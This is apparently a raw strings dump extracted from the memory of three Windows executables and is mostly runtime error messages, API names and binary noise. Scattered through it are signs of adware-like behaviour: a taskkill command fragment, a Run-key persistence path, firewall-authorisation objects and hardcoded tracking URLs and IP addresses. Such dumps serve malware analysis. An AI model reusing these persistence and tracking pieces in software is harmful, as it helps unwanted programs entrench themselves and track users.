JPEG Image File)"%s" DOMImplementation already registered;Property or Method "%s" is not supported by DOM Vendor "%s"
- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.
UTF-7Ênnot remove shell notification iconÊnnot create shell notification icon"%s requires Windows Vista or later
OLE error %.8x.Method '%s' not supported by automation object
Alt  Clipboard does not support Icons/Menu '%s' is already being used by another form
Information Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'
Scan line index out of range!Cannot change the size of an icon Invalid operation on TOleGraphic$Unknown picture file extension (.%s)
Unsupported clipboard format
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)"Unable to find a Table of Contents
No help found for %s#No context-sensitive help installed
Unable to write to %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to create key %s
Failed to get data for '%s'
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Operation not supported
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
'%s' is not a valid GUID value
I/O error %d
1.0.1011.1935
1.0.0.0

Ainqngz4.0.exe_2176:




.text
.data
.rsrc
MSVBVM60.DLL
"44)*612
urlww
.FlGc
%smzCz
SHDocVwCtl.WebBrowser
#vb6chs.dll
ieframe.dll
WebBrowser
%Program Files%\VB
\VB6.OLB
C:\Windows\System32\mshtml.tlb
winmm.dll
C:\Windows\System32\ieframe.oca
advapi32.dll
RegCloseKey
RegCreateKeyA
RegOpenKeyA
wininet.dll
InternetOpenUrlA
GetUrlSource
VBA6.DLL
sUrl
v.baofeng.com
99999999999
http://order.5bo.com/
http://wpa.qq.com
http://www.baidu.com/
http://hzf.v.baofeng.com/#
http://hzf.v.baofeng.com/
"url":"
"swfurl":"
http://
http://tv.aiqingzhihui.com/zhibo2.html?id=
\setings.ini
fdcard.exe
cmd.exe /c taskkill /im
http://tv.aiqingzhihui.com/zhibo2.html
http://y.qq.com/player
qq.com
pptv.com
sohu.com
56.com
ifeng.com
youku.com
ku6.com
tudou.com
iqiyi.com
wasu.cn
pps.tv
letv.com
imgo.tv
kankan.com
sina.com.cn
cntv.cn
m1905.com
hz.letv.com
tv.sohu.com
baofeng.com

Ainqngz4.0.exe_2176_rwx_00401000_00019000:




"44)*612
urlww
.FlGc
%smzCz
SHDocVwCtl.WebBrowser
#vb6chs.dll
ieframe.dll
WebBrowser
%Program Files%\VB
\VB6.OLB
C:\Windows\System32\mshtml.tlb
winmm.dll
C:\Windows\System32\ieframe.oca
advapi32.dll
RegCloseKey
RegCreateKeyA
RegOpenKeyA
wininet.dll
InternetOpenUrlA
GetUrlSource
VBA6.DLL
sUrl
MSVBVM60.DLL
v.baofeng.com
99999999999
http://order.5bo.com/
http://wpa.qq.com
http://www.baidu.com/
http://hzf.v.baofeng.com/#
http://hzf.v.baofeng.com/
"url":"
"swfurl":"
http://
http://tv.aiqingzhihui.com/zhibo2.html?id=
\setings.ini
fdcard.exe
cmd.exe /c taskkill /im
http://tv.aiqingzhihui.com/zhibo2.html
http://y.qq.com/player
qq.com
pptv.com
sohu.com
56.com
ifeng.com
youku.com
ku6.com
tudou.com
iqiyi.com
wasu.cn
pps.tv
letv.com
imgo.tv
kankan.com
sina.com.cn
cntv.cn
m1905.com
hz.letv.com
tv.sohu.com
baofeng.com

fdcard.exe_2184:




.text
.data
.rsrc
MSVBVM60.DLL
[11<1<0@
[:<>><<<
y%D:To
SHDocVwCtl.WebBrowser
#vb6chs.dll
ieframe.dll
WebBrowser
C:\Windows\System32\mshtml.tlb
%Program Files%\VB
\VB6.OLB
]! 2C:\Windows\System32\ieframe.oca
winmm.dll
VBA6.DLL
RegCreateKeyA
advapi32.dll
RegCloseKey
RegOpenKeyA
wininet.dll
InternetOpenUrlA
GetUrlSource
C:\Windows\system32\msvbvm60.dll\3
NotifyMsgBox
user32.dll
oleaut32.dll
kernel32.dll
WebBrowser1
WebBrowser2
0123210
)o4.tr
sUrl
\min.ini
\Set.ini
\set.ini
\Ainqngz4.0.exe
\setings.ini
http://aimini.aiqingzhihui.com/ta2/?flag=
http://aimini.aiqingzhihui.com/ta3/?flag=
http://aitime.aiqingzhihui.com/newh1/?
http://aitime.aiqingzhihui.com/newh2/?2
http://aitime.aiqingzhihui.com/newh3/?3
http://aimini.aiqingzhihui.com/new/?
http://aimini.aiqingzhihui.com/new/?2
http://tj.aiqingzhihui.com/xin/?ver=138
http://aimini.aiqingzhihui.com/ta1/?flag=
Ainqngz4.0.exe
C:\\Program Files\\Internet Explorer\\IEXPLORE.exe
cmd.exe /c taskkill /im
http://aimini.aiqingzhihui.com/new/?flag=
http://aitime.aiqingzhihui.com/dnewh1/?flag=
http://aitime.aiqingzhihui.com/dnewh2/?flag=
http://aitime.aiqingzhihui.com/dnewh3/?flag=
http://aitime.aiqingzhihui.com/newh1/?flag=
http://aitime.aiqingzhihui.com/newh2/?flag=
http://aitime.aiqingzhihui.com/newh3/?flag=

fdcard.exe_2184_rwx_00401000_0001F000:




[11<1<0@
[:<>><<<
y%D:To
SHDocVwCtl.WebBrowser
#vb6chs.dll
ieframe.dll
WebBrowser
C:\Windows\System32\mshtml.tlb
%Program Files%\VB
\VB6.OLB
]! 2C:\Windows\System32\ieframe.oca
winmm.dll
VBA6.DLL
RegCreateKeyA
advapi32.dll
RegCloseKey
RegOpenKeyA
wininet.dll
InternetOpenUrlA
GetUrlSource
C:\Windows\system32\msvbvm60.dll\3
NotifyMsgBox
user32.dll
oleaut32.dll
kernel32.dll
WebBrowser1
WebBrowser2
0123210
)o4.tr
sUrl
MSVBVM60.DLL
\min.ini
\Set.ini
\set.ini
\Ainqngz4.0.exe
\setings.ini
http://aimini.aiqingzhihui.com/ta2/?flag=
http://aimini.aiqingzhihui.com/ta3/?flag=
http://aitime.aiqingzhihui.com/newh1/?
http://aitime.aiqingzhihui.com/newh2/?2
http://aitime.aiqingzhihui.com/newh3/?3
http://aimini.aiqingzhihui.com/new/?
http://aimini.aiqingzhihui.com/new/?2
http://tj.aiqingzhihui.com/xin/?ver=138
http://aimini.aiqingzhihui.com/ta1/?flag=
Ainqngz4.0.exe
C:\\Program Files\\Internet Explorer\\IEXPLORE.exe
cmd.exe /c taskkill /im
http://aimini.aiqingzhihui.com/new/?flag=
http://aitime.aiqingzhihui.com/dnewh1/?flag=
http://aitime.aiqingzhihui.com/dnewh2/?flag=
http://aitime.aiqingzhihui.com/dnewh3/?flag=
http://aitime.aiqingzhihui.com/newh1/?flag=
http://aitime.aiqingzhihui.com/newh2/?flag=
http://aitime.aiqingzhihui.com/newh3/?flag=

Mnying.exe_2364:




.text
`.itext
`.data
.idata
.rdata
@.reloc
B.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
%s[%d]
%s_%d
USER32.DLL
EInvalidGraphicOperation
SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
uxtheme.dll
DWMAPI.DLL
UrlMon
shell32.dll
PasswordCharx)D
OnKeyDownd
OnKeyPress
OnKeyUp`
clWebSnow
clWebFloralWhite
clWebLavenderBlush
clWebOldLace
clWebIvory
clWebCornSilk
clWebBeige
clWebAntiqueWhite
clWebWheat
clWebAliceBlue
clWebGhostWhite
clWebLavender
clWebSeashell
clWebLightYellow
clWebPapayaWhip
clWebNavajoWhite
clWebMoccasin
clWebBurlywood
clWebAzure
clWebMintcream
clWebHoneydew
clWebLinen
clWebLemonChiffon
clWebBlanchedAlmond
clWebBisque
clWebPeachPuff
clWebTan
clWebYellow
clWebDarkOrange
clWebRed
clWebDarkRed
clWebMaroon
clWebIndianRed
clWebSalmon
clWebCoral
clWebGold
clWebTomato
clWebCrimson
clWebBrown
clWebChocolate
clWebSandyBrown
clWebLightSalmon
clWebLightCoral
clWebOrange
clWebOrangeRed
clWebFirebrick
clWebSaddleBrown
clWebSienna
clWebPeru
clWebDarkSalmon
clWebRosyBrown
clWebPaleGoldenrod
clWebLightGoldenrodYellow
clWebOlive
clWebForestGreen
clWebGreenYellow
clWebChartreuse
clWebLightGreen
clWebAquamarine
clWebSeaGreen
clWebGoldenRod
clWebKhaki
clWebOliveDrab
clWebGreen
clWebYellowGreen
clWebLawnGreen
clWebPaleGreen
clWebMediumAquamarine
clWebMediumSeaGreen
clWebDarkGoldenRod
clWebDarkKhaki
clWebDarkOliveGreen
clWebDarkgreen
clWebLimeGreen
clWebLime
clWebSpringGreen
clWebMediumSpringGreen
clWebDarkSeaGreen
clWebLightSeaGreen
clWebPaleTurquoise
clWebLightCyan
clWebLightBlue
clWebLightSkyBlue
clWebCornFlowerBlue
clWebDarkBlue
clWebIndigo
clWebMediumTurquoise
clWebTurquoise
clWebCyan
clWebPowderBlue
clWebSkyBlue
clWebRoyalBlue
clWebMediumBlue
clWebMidnightBlue
clWebDarkTurquoise
clWebCadetBlue
clWebDarkCyan
clWebTeal
clWebDeepskyBlue
clWebDodgerBlue
clWebBlue
clWebNavy
clWebDarkViolet
clWebDarkOrchid
clWebMagenta
clWebDarkMagenta
clWebMediumVioletRed
clWebPaleVioletRed
clWebBlueViolet
clWebMediumOrchid
clWebMediumPurple
clWebPurple
clWebDeepPink
clWebLightPink
clWebViolet
clWebOrchid
clWebPlum
clWebThistle
clWebHotPink
clWebPink
clWebLightSteelBlue
clWebMediumSlateBlue
clWebLightSlateGray
clWebWhite
clWebLightgrey
clWebGray
clWebSteelBlue
clWebSlateBlue
clWebSlateGray
clWebWhiteSmoke
clWebSilver
clWebDimGray
clWebMistyRose
clWebDarkSlateBlue
clWebDarkSlategray
clWebGainsboro
clWebDarkGray
clWebBlack
Proportional
OnExecuteP
{43826d1e-e718-42ee-bc55-a1e261c37bfe}
comctl32.dll
AutoHotkeys
TMenuH%D
Uh.FD
\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
UhÎ
imm32.dll
OnExecute8
OnExecute
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
tagMSG
GlassFrame.Bottom
GlassFrame.Enabled
GlassFrame.Left
GlassFrame.Right
GlassFrame.SheetOfGlass
GlassFrame.Top
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
User32.dll
%s, ClassID: %s
%s, ProgID: "%s"
ole32.dll
CoXMLHTTPRequest
olepro32.dll
%d.%d.%d.%d
ftp://
login error
http://
Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
HTTP/1.1
grfKeyState
TComTargetExecEvent
CmdGroup
nCmdID
nCmdexecopt
hhctrl.ocx
URLMON.DLL
SHDOCLC.DLL
IWebBrowser
IWebBrowserAppX
IWebBrowser2
TEWBWindowSetResizable
TEWBWindowSetLeft
TEWBWindowSetTop
TEWBWindowSetWidth
TEWBWindowSetHeight
bstrUrlContext
bstrUrl
OnWindowSetResizable
OnWindowSetLeft
OnWindowSetTopD
OnWindowSetWidth
OnWindowSetHeight
EWebBrokerExceptionU
PSAPI.dll
TAsyncExecuteThreadU
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Down\ETagFile.dat
HNetCfg.FwMgr
HNetCfg.FwAuthorizedApplication
%d.%d
Shell.Application
Shell32.dll
SysShadow
Content-Type: application/x-www-form-urlencoded
var x = document.createElement("link");x.rel = "stylesheet";x.type = "text/css";x.media = "screen";x.href = "
document.getElementsByTagName("head")[0].appendChild(x);
scrollbar.css
TSimpleUdpClient
D:\project\Component\superobjectv1.2.4\superobject.pas
Unsuported variant data type: %d
STcpThread
tjj.mny8.cn
tjjwt.mny8.cn
tjjdx.mny8.cn
tjjt.mny8.cn
125.43.78.107
tjj.mnyb.net
222.88.93.109
IWebBrowserApp
IWebBrowser2
TWebBrowserStatusTextChange
TWebBrowserProgressChange
TWebBrowserCommandStateChange
TWebBrowserTitleChange
TWebBrowserPropertyChange
TWebBrowserBeforeNavigate2
TWebBrowserNewWindow2
TWebBrowserNavigateComplete2
TWebBrowserDocumentComplete
TWebBrowserOnVisible
TWebBrowserOnToolBar
TWebBrowserOnMenuBar
TWebBrowserOnStatusBar
TWebBrowserOnFullScreen
TWebBrowserOnTheaterMode
TWebBrowserWindowSetResizable
TWebBrowserWindowSetLeft
TWebBrowserWindowSetTop
TWebBrowserWindowSetWidth
TWebBrowserWindowSetHeight
TWebBrowserWindowClosing
TWebBrowserClientToHostWindow
TWebBrowserSetSecureLockIcon
TWebBrowserFileDownload
TWebBrowserNavigateError
%TWebBrowserPrintTemplateInstantiation
TWebBrowserPrintTemplateTeardown
TWebBrowserUpdatePageStatus
%TWebBrowserPrivacyImpactedStateChange
TWebBrowser
TWebBrowsert
OnWindowSetResizablel
OnWindowSetTop
OnWindowSetWidthH
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
ou.mny8.com.cn
ou.mnyb.net
222.88.93.108
125.43.78.118
MAPI32.DLL
Uh.yJ
supports
importNode
gdiplus.dll
GdiplusShutdown
user32.dll
OnActionExecutex
rcmDefault
rcmDebug
DontExecuteScripts
DontExecuteJava
DontExecuteActiveX
DisableUrlIfEncodingUTF8
EnableUrlIfEncodingUTF8
CheckFontSupportsCodePage
DisableSubmitUrlInUTF8
EnableSubmitUrlInUTF8
lpMsg
PMsg
pguidCmdGroup
TTranslateUrlEvent
pchURLIn
ppchURLOut
CmdID
pszUrl
pszUrlContext
szPassWord
ErrorUrl
OptionKeyPath
OverrideOptionKeyPath
OnTranslateUrl
OnCommandExec
'%s' is not supported.
WebocPopupManagement
ValidateNavigateUrl
HttpUsernamePasswordDisable
GetUrlDomFilePathUnencoded
XmlHttp
https://
AppEvents\Schemes\Apps\Explorer\Navigating\.Current
.Current
\ieframe.dll
\shdocvw.dll
\StringFileInfo\%0.4x%0.4x\%s
TMsgEvent
TKeyEventEx
Port
Password
poPortrait
OnKeyDownt
OnKeyUp
0.750000
3333333
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)(
EmbeddedWB http://bsalsa.com/
TOnPaintWebICOEvent
ScrollLeftPic<
OnPaintWebICO<
LinkUrl<
Fav%d.dat
Setup.ini
TFormLoginTips
LoginUrl
/WebShell
CMD:Login
CMD:Reg
CMD:Logout:
CMD:Close
Uh.IM
UnsupportedGdiplusVersion
PropertyNotSupported
aclBurlyWood
rpcrt4.dll
KERNEL32.DLL
GetDeskTopIcoPositionX64.exe
mvyy.exe
dtk.vsnis.com
lbldi.dat
Heatbeat.ini
acdat.dat
%ProgramFiles%\Internet Explorer\iexplore.exe
edi.dat
http://udd.mny8.com.cn:4518/tj?qid=
http://udd.mnyb.net:4518/tj?qid=
http://125.43.78.117:4518/tj?qid=
http://222.88.93.101:4518/tj?qid=
runa.ini
FormKeyPress
lblUrl
http://web.mny8.com/Handler/Handler.ashx?action=like&id=
http://web.mny8.com/fav.aspx?id=
favicon.ico
TMonochromeLookup
uWebBrowser
lblURL
lblURLClick
lblURLMouseEnter
lblURLMouseLeave
http://soft.mny8.com
TFormWebShow
frmWebShow
ShowWebForm:
TFormWebShow WebNavParms.URL:
TFormWebShow.wb1 not HandleAllocated
Act_Loginx
Act_MaxExecute
Act_MinExecute
Act_HomePageExecute
Act_ShowTrayExecute
Act_CloseExecute
Act_AboutExecute
Act_CloseOrTrayExecute
Act_CheckUpdateExecute
Act_AutoRunExecute
Act_ShowUserPnlExecute
Act_LoginExecute
Act_RegExecute
Act_RechargeExecute
Act_RefExecute
edtSearchKeyPress
http://www.mny8.com
http://web.mny8.com/Recharge.aspx
http://www.baidu.com
http://web.mny8.com/index.html?action=search&keyword=
/WebShell
/WebShell2
btns.js
http://web.mny8.com/json/btns1/btns.js
http://web.mny8.com/renwu.html?uid=
WMOpenWebUrl
http://web.mny8.com/json/task/task.js
TFormWebShowOnly
frmWebShowOnly
pTipsType:%d
ShellExecute
username=%s&taskid=%s&action=taskok
MnyingU.exe
advapi32.dll
RegOpenKeyExA
RegCloseKey
GetKeyboardType
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutNameA
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
EnumChildWindows
ActivateKeyboardLayout
gdi32.dll
SetViewportOrgEx
version.dll
WinExec
GetCPInfo
CreatePipe
RegQueryInfoKeyA
RegFlushKey
RegEnumKeyExA
RegDeleteKeyA
RegCreateKeyExA
wininet.dll
InternetOpenUrlA
HttpSendRequestA
HttpQueryInfoA
HttpOpenRequestA
HttpAddRequestHeadersA
ShellExecuteExA
ShellExecuteW
ShellExecuteA
comdlg32.dll
wsock32.dll
ws2_32.dll
iphlpapi.dll
msvcrt.dll
GdipGetStringFormatHotkeyPrefix
GdipSetStringFormatHotkeyPrefix
GdipSetImageAttributesColorKeys
winmm.dll
4"4-4?4_4
? ?(?0?8?@?
4(424@4}4
=$=2=6=~=
=0>4>8><>
< <$<(<,<0<4<8<<<@<
6 6$6(6,6
>">&>*>.>
1"3&3*3.32363:3
1-282F2i2p2}2
1&1.161`1
='> >3>7><>
2 2(20282@2
3 3$3(3,3034383
6%6u6
3!3%3,3~3
8#8(8-8|8
5!6(6/666=6
9#: :/:4:
=">&>*>0>
4 4$4(4,4044484<4
; ;$;(;,;0;4;8;<;
stdole2.tlbWWW
:WebShell
mUrlsWWW
ShowWebFormW
TaUrl
urlW
licourlWW
-ShowUrlW
OpenUrlW
KeyW
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
.KBx=
.QaQU@q
K1j=%d
%fq'A
hf%ub
8%FqS
.JmgL
n.UZt
eK0%D
jt%xR
b%xhE
KWindows
USimpleTcp
7USimpleUdpClient
?HTTPApp
>WebConst
lfrmLoginTips
uMsgFilter
frmUserLogin
UPipeTransConst
UPipeTransClient
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
PNGImage.Data
iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
Picture.Data
6z%ug
%uI"Q?
FormLoginTips
diTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?>        nWqU
Z.xeX`
%uB9oj
" id="W5M0MpCehiHzreSzNTczkc9d"?>        $
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
DialogBoxes.DisableAll
PrintOptions.Margins.Left
PrintOptions.Margins.Right
PrintOptions.Margins.Top
PrintOptions.Margins.Bottom
PrintOptions.HTMLHeader.Strings
PrintOptions.Orientation
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
%.fE 
Constraints.MinHeight
Constraints.MinWidth
" id="W5M0MpCehiHzreSzNTczkc9d"?>        &V
" id="W5M0MpCehiHzreSzNTczkc9d"?>        T
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
TFormUserLogin
FormUserLogin
30]%S
EÞ,
Z.czN
Ce%x'x
.xCn>
.cx!Y
T.yj1
xZ<.ad
imgLoginBottom
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
?
btnLogin
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
btnLoginClick
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
lblQQLogin
lblQQLoginClick
lblQQLoginMouseEnter
lblQQLoginMouseLeave
edtRePass
edtPassKeyPress
edtUserKeyPress
edtPass
FormWebShow
DisableErrors.fpExceptions
HTMLCode.Strings
BtnImage.Data
BgPic.Data
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
FormWebShowOnly
" id="W5M0MpCehiHzreSzNTczkc9d"?>        
PicBtnLeft.Data
PicBtnRight.Data
TabPic.Data
ScrollLeftPic.Data
ScrollRightPic.Data
CloseBtnPic.Data
MenuBtnPic.Data
NewBtnPic.Data
Act_Login
version="11.0.2902.10471"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
http://www.w3.org/2001/XMLSchema
errorUrl
{surl}
loginurl
keyword
{"key":"
TFORMLOGINTIPS
TFORMUSERLOGIN
TFORMWEBSHOW
TFORMWEBSHOWONLY
,Unsupported Application Extension block size
Unknown GIF block type'Object type not supported for operation
Unsupported PixelFormat
Invalid stream operation
Invalid extension introducerúiled to allocate memory for GIF DIB
Invalid Image trailerAInternal error: Extension Instance does not match Extension Label/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s=Error decoding URL style (%%XX) encoded string at position ÑInvalid URL encoded character (%s) at position %d&Cannot change the size of a JPEG image
JPEG error #%d
JPEG Image File)"%s" DOMImplementation already registered;Property or Method "%s" is not supported by DOM Vendor "%s"
- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.
UTF-7Ênnot remove shell notification iconÊnnot create shell notification icon"%s requires Windows Vista or later
OLE error %.8x.Method '%s' not supported by automation object
Alt  Clipboard does not support Icons/Menu '%s' is already being used by another form
Information Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'
Scan line index out of range!Cannot change the size of an icon Invalid operation on TOleGraphic$Unknown picture file extension (.%s)
Unsupported clipboard format
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)"Unable to find a Table of Contents
No help found for %s#No context-sensitive help installed
Unable to write to %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to create key %s
Failed to get data for '%s'
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Operation not supported
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
'%s' is not a valid GUID value
I/O error %d
1.0.1011.1935
1.0.0.0

Mnying.exe_3116:




.text
`.itext
`.data
.idata
.rdata
@.reloc
B.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
%s[%d]
%s_%d
USER32.DLL
EInvalidGraphicOperation
SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
uxtheme.dll
DWMAPI.DLL
UrlMon
shell32.dll
PasswordCharx)D
OnKeyDownd
OnKeyPress
OnKeyUp`
clWebSnow
clWebFloralWhite
clWebLavenderBlush
clWebOldLace
clWebIvory
clWebCornSilk
clWebBeige
clWebAntiqueWhite
clWebWheat
clWebAliceBlue
clWebGhostWhite
clWebLavender
clWebSeashell
clWebLightYellow
clWebPapayaWhip
clWebNavajoWhite
clWebMoccasin
clWebBurlywood
clWebAzure
clWebMintcream
clWebHoneydew
clWebLinen
clWebLemonChiffon
clWebBlanchedAlmond
clWebBisque
clWebPeachPuff
clWebTan
clWebYellow
clWebDarkOrange
clWebRed
clWebDarkRed
clWebMaroon
clWebIndianRed
clWebSalmon
clWebCoral
clWebGold
clWebTomato
clWebCrimson
clWebBrown
clWebChocolate
clWebSandyBrown
clWebLightSalmon
clWebLightCoral
clWebOrange
clWebOrangeRed
clWebFirebrick
clWebSaddleBrown
clWebSienna
clWebPeru
clWebDarkSalmon
clWebRosyBrown
clWebPaleGoldenrod
clWebLightGoldenrodYellow
clWebOlive
clWebForestGreen
clWebGreenYellow
clWebChartreuse
clWebLightGreen
clWebAquamarine
clWebSeaGreen
clWebGoldenRod
clWebKhaki
clWebOliveDrab
clWebGreen
clWebYellowGreen
clWebLawnGreen
clWebPaleGreen
clWebMediumAquamarine
clWebMediumSeaGreen
clWebDarkGoldenRod
clWebDarkKhaki
clWebDarkOliveGreen
clWebDarkgreen
clWebLimeGreen
clWebLime
clWebSpringGreen
clWebMediumSpringGreen
clWebDarkSeaGreen
clWebLightSeaGreen
clWebPaleTurquoise
clWebLightCyan
clWebLightBlue
clWebLightSkyBlue
clWebCornFlowerBlue
clWebDarkBlue
clWebIndigo
clWebMediumTurquoise
clWebTurquoise
clWebCyan
clWebPowderBlue
clWebSkyBlue
clWebRoyalBlue
clWebMediumBlue
clWebMidnightBlue
clWebDarkTurquoise
clWebCadetBlue
clWebDarkCyan
clWebTeal
clWebDeepskyBlue
clWebDodgerBlue
clWebBlue
clWebNavy
clWebDarkViolet
clWebDarkOrchid
clWebMagenta
clWebDarkMagenta
clWebMediumVioletRed
clWebPaleVioletRed
clWebBlueViolet
clWebMediumOrchid
clWebMediumPurple
clWebPurple
clWebDeepPink
clWebLightPink
clWebViolet
clWebOrchid
clWebPlum
clWebThistle
clWebHotPink
clWebPink
clWebLightSteelBlue
clWebMediumSlateBlue
clWebLightSlateGray
clWebWhite
clWebLightgrey
clWebGray
clWebSteelBlue
clWebSlateBlue
clWebSlateGray
clWebWhiteSmoke
clWebSilver
clWebDimGray
clWebMistyRose
clWebDarkSlateBlue
clWebDarkSlategray
clWebGainsboro
clWebDarkGray
clWebBlack
Proportional
OnExecuteP
{43826d1e-e718-42ee-bc55-a1e261c37bfe}
comctl32.dll
AutoHotkeys
TMenuH%D
Uh.FD
\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
UhÎ
imm32.dll
OnExecute8
OnExecute
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
tagMSG
GlassFrame.Bottom
GlassFrame.Enabled
GlassFrame.Left
GlassFrame.Right
GlassFrame.SheetOfGlass
GlassFrame.Top
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
User32.dll
%s, ClassID: %s
%s, ProgID: "%s"
ole32.dll
CoXMLHTTPRequest
olepro32.dll
%d.%d.%d.%d
ftp://
login error
http://
Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
HTTP/1.1
grfKeyState
TComTargetExecEvent
CmdGroup
nCmdID
nCmdexecopt
hhctrl.ocx
URLMON.DLL
SHDOCLC.DLL
IWebBrowser
IWebBrowserAppX
IWebBrowser2
TEWBWindowSetResizable
TEWBWindowSetLeft
TEWBWindowSetTop
TEWBWindowSetWidth
TEWBWindowSetHeight
bstrUrlContext
bstrUrl
OnWindowSetResizable
OnWindowSetLeft
OnWindowSetTopD
OnWindowSetWidth
OnWindowSetHeight
EWebBrokerExceptionU
PSAPI.dll
TAsyncExecuteThreadU
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Down\ETagFile.dat
HNetCfg.FwMgr
HNetCfg.FwAuthorizedApplication
%d.%d
Shell.Application
Shell32.dll
SysShadow
Content-Type: application/x-www-form-urlencoded
var x = document.createElement("link");x.rel = "stylesheet";x.type = "text/css";x.media = "screen";x.href = "
document.getElementsByTagName("head")[0].appendChild(x);
scrollbar.css
TSimpleUdpClient
D:\project\Component\superobjectv1.2.4\superobject.pas
